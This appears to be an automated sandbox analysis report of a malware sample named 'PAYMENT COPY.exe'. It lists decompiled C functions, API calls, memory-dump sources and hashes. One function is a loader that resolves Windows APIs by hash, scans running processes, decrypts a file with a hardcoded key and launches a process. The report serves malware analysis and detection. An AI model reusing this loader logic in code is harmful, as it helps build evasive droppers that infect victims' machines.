                                                                    0x72c33991
                                                                    0x00000000
                                                                    0x72c3398f
                                                                    0x72c339d7
                                                                    0x72c339df
                                                                    0x72c339e6
                                                                    0x72c339f2
                                                                    0x72c339f2
                                                                    0x72c339fb
                                                                    0x72c339fb
                                                                    0x00000000

                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 72C33825
                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 72C339F2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.242406987.0000000072C33000.00000040.00020000.sdmp, Offset: 72C30000, based on PE: true
                                                                    • Associated: 00000000.00000002.242369499.0000000072C30000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.242381961.0000000072C31000.00000080.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.242396929.0000000072C32000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.242433913.0000000072C35000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CreateFileFreeVirtual
                                                                    • String ID:
                                                                    • API String ID: 204039940-0
                                                                    • Opcode ID: 1a27eacef18cec4e83dd66d6f105d4ce73f2ffecc6ce0885b3943496d180ad0d
                                                                    • Instruction ID: d2235dc38f69927724f60b7cbadbdf22b18443d98127e4fa16a05c2e472010f0
                                                                    • Opcode Fuzzy Hash: 1a27eacef18cec4e83dd66d6f105d4ce73f2ffecc6ce0885b3943496d180ad0d
                                                                    • Instruction Fuzzy Hash: A0A11334E01209EFDF12CFE8C985BADBBB1BF18315F60485AE901BB2A1D3745A51DB52
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040583A, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E0040583A(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x408384;
				_v36.Group = 0x408384;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x408374;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                                    0x00405845
                                                                    0x00405849
                                                                    0x0040584c
                                                                    0x00405852
                                                                    0x00405856
                                                                    0x0040585a
                                                                    0x00405862
                                                                    0x00405869
                                                                    0x0040586f
                                                                    0x00405876
                                                                    0x0040587d
                                                                    0x00405885
                                                                    0x00405887
                                                                    0x00000000
                                                                    0x00405887
                                                                    0x00405891
                                                                    0x00405898
                                                                    0x004058ae
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004058b0
                                                                    0x004058b4

                                                                    APIs
                                                                    • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\), ref: 0040587D
                                                                    • GetLastError.KERNEL32 ref: 00405891
                                                                    • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004058A6
                                                                    • GetLastError.KERNEL32 ref: 004058B0
                                                                    Strings
                                                                    • C:\Users\user\Desktop, xrefs: 0040583A
                                                                    • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405860
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                    • String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                    • API String ID: 3449924974-2752704311
                                                                    • Opcode ID: df2ca303ac227c9e0d0fbc5e27afd1aa0bff8a01fb2d8cf1edb312bec269ebc1
                                                                    • Instruction ID: 86bcb966140a1f7c96d74b09234fd9797acdbeb10da2454792965a81b57d7874
                                                                    • Opcode Fuzzy Hash: df2ca303ac227c9e0d0fbc5e27afd1aa0bff8a01fb2d8cf1edb312bec269ebc1
                                                                    • Instruction Fuzzy Hash: 80011A72D00219DAEF10DFA0C944BEFBBB8EF04355F00803ADA45B6290D7799659CF99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004065E8, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E004065E8(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x40a014; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}








                                                                    0x004065ff
                                                                    0x00406608
                                                                    0x0040660a
                                                                    0x0040660a
                                                                    0x0040660e
                                                                    0x00406620
                                                                    0x0040661a
                                                                    0x0040661a
                                                                    0x0040661a
                                                                    0x00406624
                                                                    0x00406638
                                                                    0x0040664c
                                                                    0x00406653

                                                                    APIs
                                                                    • GetSystemDirectoryA.KERNEL32 ref: 004065FF
                                                                    • wsprintfA.USER32 ref: 00406638
                                                                    • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040664C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                    • String ID: %s%s.dll$UXTHEME$\
                                                                    • API String ID: 2200240437-4240819195
                                                                    • Opcode ID: dd037f00298a2975fe7e642a10d0852ddcb34bcb2038a79f7270f2bd0b83f80d
                                                                    • Instruction ID: 7902db4e393e31f005eed81eae05c73ad43ba894215c6af4be7b8d9a3309d3f8
                                                                    • Opcode Fuzzy Hash: dd037f00298a2975fe7e642a10d0852ddcb34bcb2038a79f7270f2bd0b83f80d
                                                                    • Instruction Fuzzy Hash: 26F0217050020967EB149764DD0DFFB375CAB08304F14047BA586F10D1DAB9D5358F6D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 72C342DC, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207filememoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 71%
                                                                    			E72C342DC(void* __ecx, void* __edx, void* __eflags, WCHAR* _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				char _v49;
				char _v50;
				char _v51;
				char _v52;
				char _v53;
				char _v54;
				char _v55;
				char _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				long _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				signed int _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				char _v140;
				char _v208;
				char _v1248;
				signed int _t124;
				void* _t126;
				void* _t130;
				signed int _t131;
				void* _t132;
				int _t134;
				int _t137;
				signed int _t147;
				void* _t149;
				signed int _t150;
				void* _t152;
				signed int _t153;
				void* _t155;
				void* _t156;
				void* _t157;
				void* _t158;
				void* _t159;

				_t159 = __eflags;
				_t157 = __edx;
				_t156 = __ecx;
				_v20 = _v20 & 0x00000000;
				_v84 = _v84 & 0x00000000;
				_v56 = 0x32;
				_v55 = 0x66;
				_v54 = 0x31;
				_v53 = 0x63;
				_v52 = 0x38;
				_v51 = 0x33;
				_v50 = 0x66;
				_v49 = 0x63;
				_v48 = 0x35;
				_v47 = 0x34;
				_v46 = 0x34;
				_v45 = 0x38;
				_v44 = 0x34;
				_v43 = 0x35;
				_v42 = 0x63;
				_v41 = 0x39;
				_v40 = 0x38;
				_v39 = 0x64;
				_v38 = 0x30;
				_v37 = 0x34;
				_v36 = 0x31;
				_v35 = 0x37;
				_v34 = 0x36;
				_v33 = 0x64;
				_v32 = 0x66;
				_v31 = 0x31;
				_v30 = 0x66;
				_v29 = 0x32;
				_v28 = 0x30;
				_v27 = 0x38;
				_v26 = 0x38;
				_v25 = 0x61;
				_v24 = 0;
				_v16 = _v16 & 0x00000000;
				_v116 = _v116 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_v8 = E72C345A0();
				_v60 = E72C34648(_v8, 0x34cf0bf);
				_v64 = E72C34648(_v8, 0x55e38b1f);
				_v68 = E72C34648(_v8, 0xd1775dc4);
				_v120 = E72C34648(_v8, 0xd6eb2188);
				_v96 = E72C34648(_v8, 0xa2eae210);
				_v124 = E72C34648(_v8, 0xcd8538b2);
				_v72 = E72C34648(_v8, 0x8a111d91);
				_v76 = E72C34648(_v8, 0x170c1ca1);
				_v80 = E72C34648(_v8, 0xa5f15738);
				_v88 = E72C34648(_v8, 0x433a3842);
				_v92 = E72C34648(_v8, 0x2ffe2c64);
				_v112 = 0x2d734193;
				_v108 = 0x63daa681;
				_v104 = 0x26090612;
				_v100 = 0x6f28fae0;
				_t124 = 4;
				_t126 = E72C34239(_t159,  *((intOrPtr*)(_t158 + _t124 * 0 - 0x6c))); // executed
				_t160 = _t126;
				if(_t126 != 0) {
					L4:
					_v60(0x7918);
					L5:
					_v68(0,  &_v1248, 0x103);
					_t130 = CreateFileW(_a4, 0x80000000, 7, 0, 3, 0x80, 0);
					_v20 = _t130;
					if(_v20 != 0xffffffff) {
						_t131 = _v76(_v20, 0);
						_v16 = _t131;
						__eflags = _v16 - 0xffffffff;
						if(_v16 != 0xffffffff) {
							_t132 = VirtualAlloc(0, _v16, 0x3000, 4);
							_v12 = _t132;
							__eflags = _v12;
							if(_v12 != 0) {
								_t134 = ReadFile(_v20, _v12, _v16,  &_v84, 0);
								__eflags = _t134;
								if(_t134 != 0) {
									_t99 =  &_v56; // 0x32
									E72C3403D(_v12, _t99, 0x20);
									_t137 = E72C33034(_t156, _t157, __eflags, _v12); // executed
									__eflags = _t137;
									if(_t137 != 0) {
										_v60(0xbb8);
										E72C33005(_t156,  &_v140, 0x10);
										E72C33005(_t156,  &_v208, 0x44);
										_t137 = _v96( &_v1248, _v92(0, 0, 0, 0x20, 0, 0,  &_v208,  &_v140));
										__eflags = _t137;
										if(_t137 != 0) {
											_t137 = _v64(0);
										}
									}
									ExitProcess(0);
								}
								return _t134;
							}
							return _t132;
						}
						return _t131;
					}
					return _t130;
				}
				_t147 = 4;
				_t149 = E72C34239(_t160,  *((intOrPtr*)(_t158 + (_t147 << 0) - 0x6c))); // executed
				_t161 = _t149;
				if(_t149 != 0) {
					goto L4;
				}
				_t150 = 4;
				_t152 = E72C34239(_t161,  *((intOrPtr*)(_t158 + (_t150 << 1) - 0x6c))); // executed
				_t162 = _t152;
				if(_t152 != 0) {
					goto L4;
				}
				_t153 = 4;
				_t155 = E72C34239(_t162,  *((intOrPtr*)(_t158 + _t153 * 3 - 0x6c))); // executed
				if(_t155 == 0) {
					goto L5;
				}
				goto L4;
			}













































































                                                                    0x72c342dc
                                                                    0x72c342dc
                                                                    0x72c342dc
                                                                    0x72c342e5
                                                                    0x72c342e9
                                                                    0x72c342ed
                                                                    0x72c342f1
                                                                    0x72c342f5
                                                                    0x72c342f9
                                                                    0x72c342fd
                                                                    0x72c34301
                                                                    0x72c34305
                                                                    0x72c34309
                                                                    0x72c3430d
                                                                    0x72c34311
                                                                    0x72c34315
                                                                    0x72c34319
                                                                    0x72c3431d
                                                                    0x72c34321
                                                                    0x72c34325
                                                                    0x72c34329
                                                                    0x72c3432d
                                                                    0x72c34331
                                                                    0x72c34335
                                                                    0x72c34339
                                                                    0x72c3433d
                                                                    0x72c34341
                                                                    0x72c34345
                                                                    0x72c34349
                                                                    0x72c3434d
                                                                    0x72c34351
                                                                    0x72c34355
                                                                    0x72c34359
                                                                    0x72c3435d
                                                                    0x72c34361
                                                                    0x72c34365
                                                                    0x72c34369
                                                                    0x72c3436d
                                                                    0x72c34371
                                                                    0x72c34375
                                                                    0x72c34379
                                                                    0x72c34382
                                                                    0x72c34392
                                                                    0x72c343a2
                                                                    0x72c343b2
                                                                    0x72c343c2
                                                                    0x72c343d2
                                                                    0x72c343e2
                                                                    0x72c343f2
                                                                    0x72c34402
                                                                    0x72c34412
                                                                    0x72c34422
                                                                    0x72c34432
                                                                    0x72c34435
                                                                    0x72c3443c
                                                                    0x72c34443
                                                                    0x72c3444a
                                                                    0x72c34453
                                                                    0x72c3445b
                                                                    0x72c34460
                                                                    0x72c34462
                                                                    0x72c3449c
                                                                    0x72c344a1
                                                                    0x72c344a4
                                                                    0x72c344b2
                                                                    0x72c344ca
                                                                    0x72c344cd
                                                                    0x72c344d4
                                                                    0x72c344e0
                                                                    0x72c344e3
                                                                    0x72c344e6
                                                                    0x72c344ea
                                                                    0x72c344fd
                                                                    0x72c34500
                                                                    0x72c34503
                                                                    0x72c34507
                                                                    0x72c3451d
                                                                    0x72c34520
                                                                    0x72c34522
                                                                    0x72c34528
                                                                    0x72c3452f
                                                                    0x72c34537
                                                                    0x72c3453c
                                                                    0x72c3453e
                                                                    0x72c34545
                                                                    0x72c34551
                                                                    0x72c3455f
                                                                    0x72c34589
                                                                    0x72c3458c
                                                                    0x72c3458e
                                                                    0x72c34592
                                                                    0x72c34592
                                                                    0x72c3458e
                                                                    0x72c34597
                                                                    0x72c34597
                                                                    0x00000000
                                                                    0x72c34522
                                                                    0x00000000
                                                                    0x72c34507
                                                                    0x00000000
                                                                    0x72c344ea
                                                                    0x00000000
                                                                    0x72c344d4
                                                                    0x72c34466
                                                                    0x72c3446e
                                                                    0x72c34473
                                                                    0x72c34475
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x72c34479
                                                                    0x72c34480
                                                                    0x72c34485
                                                                    0x72c34487
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x72c3448b
                                                                    0x72c34493
                                                                    0x72c3449a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000

                                                                    APIs
                                                                      • Part of subcall function 72C34239: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,873D1860,?,5C7BF6E9,?,EA31D3B6), ref: 72C3427E
                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 72C344CA
                                                                      • Part of subcall function 72C34239: Process32FirstW.KERNEL32(000000FF,0000022C), ref: 72C342A2
                                                                    • VirtualAlloc.KERNELBASE(00000000,000000FF,00003000,00000004), ref: 72C344FD
                                                                      • Part of subcall function 72C34239: Process32NextW.KERNEL32(000000FF,0000022C), ref: 72C342CD
                                                                    • ReadFile.KERNELBASE(000000FF,00000000,000000FF,00000000,00000000), ref: 72C3451D
                                                                    • ExitProcess.KERNEL32(00000000), ref: 72C34597
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.242406987.0000000072C33000.00000040.00020000.sdmp, Offset: 72C30000, based on PE: true
                                                                    • Associated: 00000000.00000002.242369499.0000000072C30000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.242381961.0000000072C31000.00000080.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.242396929.0000000072C32000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.242433913.0000000072C35000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CreateFileProcess32$AllocExitFirstNextProcessReadSnapshotToolhelp32Virtual
                                                                    • String ID: 2f1c83fc544845c98d04176df1f2088a
                                                                    • API String ID: 1567874941-2566987791
                                                                    • Opcode ID: e5a720b48dfee86a2bce5bda78bc445742454f45de2ea5702a751a62f69fada8
                                                                    • Instruction ID: 0874b8030e9a9c1f9048ef4aac984d123faac7c94505affcd13da4a6efb4405f
                                                                    • Opcode Fuzzy Hash: e5a720b48dfee86a2bce5bda78bc445742454f45de2ea5702a751a62f69fada8
                                                                    • Instruction Fuzzy Hash: 8C914B70D04288EEEF138BE8CC09BDDBFB5AF25714F904459E640BE192D7B60A15CB66
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405E15, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00405E15(char _a4, intOrPtr _a6, CHAR* _a8) {
				char _t11;
				signed int _t12;
				int _t15;
				signed int _t17;
				void* _t20;
				CHAR* _t21;

				_t21 = _a4;
				_t20 = 0x64;
				while(1) {
					_t11 =  *0x40a3ec; // 0x61736e
					_t20 = _t20 - 1;
					_a4 = _t11;
					_t12 = GetTickCount();
					_t17 = 0x1a;
					_a6 = _a6 + _t12 % _t17;
					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
					if(_t15 != 0) {
						break;
					}
					if(_t20 != 0) {
						continue;
					}
					 *_t21 =  *_t21 & 0x00000000;
					return _t15;
				}
				return _t21;
			}









                                                                    0x00405e19
                                                                    0x00405e1f
                                                                    0x00405e20
                                                                    0x00405e20
                                                                    0x00405e25
                                                                    0x00405e26
                                                                    0x00405e29
                                                                    0x00405e33
                                                                    0x00405e40
                                                                    0x00405e43
                                                                    0x00405e4b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405e4f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405e51
                                                                    0x00000000
                                                                    0x00405e51
                                                                    0x00000000

                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 00405E29
                                                                    • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405E43
                                                                    Strings
                                                                    • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405E18
                                                                    • nsa, xrefs: 00405E20
                                                                    • "C:\Users\user\Desktop\PAYMENT COPY.exe" , xrefs: 00405E15
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CountFileNameTempTick
                                                                    • String ID: "C:\Users\user\Desktop\PAYMENT COPY.exe" $C:\Users\user~1\AppData\Local\Temp\$nsa
                                                                    • API String ID: 1716503409-894885592
                                                                    • Opcode ID: 6f67c72f8a62f6904c1c8d13d4c39cdc389fdf02a571d79ef00f96109094c4c4
                                                                    • Instruction ID: 94097d04b6c38ee8b1870d6a931f35239ed30ef0cd20ec9d97f11959184772c3
                                                                    • Opcode Fuzzy Hash: 6f67c72f8a62f6904c1c8d13d4c39cdc389fdf02a571d79ef00f96109094c4c4
                                                                    • Instruction Fuzzy Hash: E4F0A7363442087BDB109F55EC44B9B7B9DDF91750F14C03BF984DA1C0D6B0D9988798
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 735816DB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 94%
                                                                    			E735816DB(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				char _v88;
				struct HINSTANCE__* _t37;
				intOrPtr _t42;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t54;
				intOrPtr _t57;
				signed int _t61;
				signed int _t63;
				void* _t67;
				void* _t68;
				void* _t72;
				void* _t76;

				_t76 = __esi;
				_t68 = __edi;
				_t67 = __edx;
				 *0x7358405c = _a8;
				 *0x73584060 = _a16;
				 *0x73584064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x73584038, E73581556);
				_push(1); // executed
				_t37 = E73581A98(); // executed
				_t54 = _t37;
				if(_t54 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t54 + 4)) != 1) {
						E735822AF(_t54);
					}
					E735822F1(_t67, _t54);
					_t57 =  *((intOrPtr*)(_t54 + 4));
					if(_t57 == 0xffffffff) {
						L14:
						if(( *(_t54 + 0x810) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t54 + 4)) == 0) {
								_t37 = E735824D8(_t54);
							} else {
								_push(_t76);
								_push(_t68);
								_t61 = 8;
								_t13 = _t54 + 0x818; // 0x818
								memcpy( &_v36, _t13, _t61 << 2);
								_t42 = E7358156B(_t54,  &_v88);
								 *(_t54 + 0x834) =  *(_t54 + 0x834) & 0x00000000;
								_t18 = _t54 + 0x818; // 0x818
								_t72 = _t18;
								 *((intOrPtr*)(_t54 + 0x820)) = _t42;
								 *_t72 = 3;
								E735824D8(_t54);
								_t63 = 8;
								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
							}
						} else {
							E735824D8(_t54);
							_t37 = GlobalFree(E73581266(E73581559(_t54)));
						}
						if( *((intOrPtr*)(_t54 + 4)) != 1) {
							_t37 = E7358249E(_t54);
							if(( *(_t54 + 0x810) & 0x00000040) != 0 &&  *_t54 == 1) {
								_t37 =  *(_t54 + 0x808);
								if(_t37 != 0) {
									_t37 = FreeLibrary(_t37);
								}
							}
							if(( *(_t54 + 0x810) & 0x00000020) != 0) {
								_t37 = E735814E2( *0x73584058);
							}
						}
						if(( *(_t54 + 0x810) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t54);
						}
					}
					_t48 =  *_t54;
					if(_t48 == 0) {
						if(_t57 != 1) {
							goto L14;
						}
						E73582CC3(_t54);
						L12:
						_t54 = _t48;
						L13:
						goto L14;
					}
					_t49 = _t48 - 1;
					if(_t49 == 0) {
						L8:
						_t48 = E73582A38(_t57, _t54); // executed
						goto L12;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						E735826B2(_t54);
						goto L13;
					}
					if(_t50 != 1) {
						goto L14;
					}
					goto L8;
				}
			}


















                                                                    0x735816db
                                                                    0x735816db
                                                                    0x735816db
                                                                    0x735816e5
                                                                    0x735816ed
                                                                    0x735816fa
                                                                    0x73581708
                                                                    0x7358170b
                                                                    0x7358170d
                                                                    0x73581712
                                                                    0x73581717
                                                                    0x73581836
                                                                    0x73581836
                                                                    0x7358171d
                                                                    0x73581721
                                                                    0x73581724
                                                                    0x73581729
                                                                    0x7358172b
                                                                    0x73581731
                                                                    0x73581737
                                                                    0x73581767
                                                                    0x7358176e
                                                                    0x73581792
                                                                    0x735817dd
                                                                    0x73581794
                                                                    0x73581794
                                                                    0x73581795
                                                                    0x7358179b
                                                                    0x7358179c
                                                                    0x735817a6
                                                                    0x735817a9
                                                                    0x735817ae
                                                                    0x735817b5
                                                                    0x735817b5
                                                                    0x735817bc
                                                                    0x735817c2
                                                                    0x735817c8
                                                                    0x735817d5
                                                                    0x735817d6
                                                                    0x735817d9
                                                                    0x73581770
                                                                    0x73581771
                                                                    0x73581786
                                                                    0x73581786
                                                                    0x735817e7
                                                                    0x735817ea
                                                                    0x735817f7
                                                                    0x735817fe
                                                                    0x73581806
                                                                    0x73581809
                                                                    0x73581809
                                                                    0x73581806
                                                                    0x73581816
                                                                    0x7358181e
                                                                    0x73581823
                                                                    0x73581816
                                                                    0x7358182b
                                                                    0x00000000
                                                                    0x7358182d
                                                                    0x00000000
                                                                    0x7358182e
                                                                    0x7358182b
                                                                    0x7358173b
                                                                    0x7358173e
                                                                    0x7358175c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x7358175f
                                                                    0x73581764
                                                                    0x73581764
                                                                    0x73581766
                                                                    0x00000000
                                                                    0x73581766
                                                                    0x73581740
                                                                    0x73581741
                                                                    0x73581749
                                                                    0x7358174a
                                                                    0x00000000
                                                                    0x7358174a
                                                                    0x73581743
                                                                    0x73581744
                                                                    0x73581752
                                                                    0x00000000
                                                                    0x73581752
                                                                    0x73581747
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x73581747

                                                                    APIs
                                                                      • Part of subcall function 73581A98: GlobalFree.KERNEL32 ref: 73581D09
                                                                      • Part of subcall function 73581A98: GlobalFree.KERNEL32 ref: 73581D0E
                                                                      • Part of subcall function 73581A98: GlobalFree.KERNEL32 ref: 73581D13
                                                                    • GlobalFree.KERNEL32 ref: 73581786
                                                                    • FreeLibrary.KERNEL32(?), ref: 73581809
                                                                    • GlobalFree.KERNEL32 ref: 7358182E
                                                                      • Part of subcall function 735822AF: GlobalAlloc.KERNEL32(00000040,?), ref: 735822E0
                                                                      • Part of subcall function 735826B2: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,73581757,00000000), ref: 73582782
                                                                      • Part of subcall function 7358156B: wsprintfA.USER32 ref: 73581599
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.242471104.0000000073581000.00000020.00020000.sdmp, Offset: 73580000, based on PE: true
                                                                    • Associated: 00000000.00000002.242447030.0000000073580000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.242513496.0000000073583000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.242533114.0000000073585000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Global$Free$Alloc$Librarywsprintf
                                                                    • String ID:
                                                                    • API String ID: 3962662361-3916222277
                                                                    • Opcode ID: 83c73c995faeb733bb49783525f10a340aa5dcabefb66795550e827ae5e201cb
                                                                    • Instruction ID: 64226abfa43fb2619da1df8065ffd7f127956c83592da45da98fde6866a64a1a
                                                                    • Opcode Fuzzy Hash: 83c73c995faeb733bb49783525f10a340aa5dcabefb66795550e827ae5e201cb
                                                                    • Instruction Fuzzy Hash: A1416DB21003089BDB01AF65F984BDA3BBCBF44314F18846AE94B9E1D6DB749245CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004032BF, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 93%
                                                                    			E004032BF(intOrPtr _a4) {
				intOrPtr _t11;
				signed int _t12;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t30;
				intOrPtr _t33;
				intOrPtr _t35;
				void* _t36;
				intOrPtr _t48;

				_t33 =  *0x429464 -  *0x40b898 + _a4;
				 *0x42f450 = GetTickCount() + 0x1f4;
				if(_t33 <= 0) {
					L22:
					E00402E52(1);
					return 0;
				}
				E0040343E( *0x429474);
				SetFilePointer( *0x40a01c,  *0x40b898, 0, 0); // executed
				 *0x429470 = _t33;
				 *0x429460 = 0;
				while(1) {
					_t30 = 0x4000;
					_t11 =  *0x429468 -  *0x429474;
					if(_t11 <= 0x4000) {
						_t30 = _t11;
					}
					_t12 = E00403428(0x41d460, _t30);
					if(_t12 == 0) {
						break;
					}
					 *0x429474 =  *0x429474 + _t30;
					 *0x40b8a0 = 0x41d460;
